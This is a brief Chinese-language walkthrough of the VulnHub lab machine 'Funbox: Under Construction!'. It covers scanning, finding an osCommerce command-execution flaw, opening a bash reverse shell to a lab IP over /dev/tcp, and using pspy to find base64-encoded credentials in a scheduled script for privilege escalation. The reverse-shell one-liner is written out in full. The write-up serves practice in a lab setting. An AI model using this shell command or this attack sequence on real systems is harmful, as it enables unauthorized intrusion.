作者:Only_cxy | 来源:互联网 | 2023-10-11 12:52
环境搭建:
Funbox: Under Construction! ~ VulnHub
漏洞复现:
探测靶机的IP地址
nmap进行探测靶机的服务和端口
访问80端口
dirb扫描目录,发现catalog目录
访问一下,发现是个oscommerce的网站
查看版本的漏洞,发现命令执行漏洞
查看该文件,如果执行成功,会返回当前目录的文件
修改为靶机的IP
运行脚本
访问文件,得到回显
修改命令
bash -c "exec bash -i &>/dev/tcp/192.168.226.128/1111 <&1"
查看全局变量,查看执行文件都没发现可以利用
下载pspy64s
wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64s
kali开启python服务,靶机进行下载
修改权限,进行执行
发现会执行一个脚本文件
发现一个base64语句
进行解密,发现账号密码
切换用户登录,要升级shell模式,不然不可以切换用户
查看目录下的flag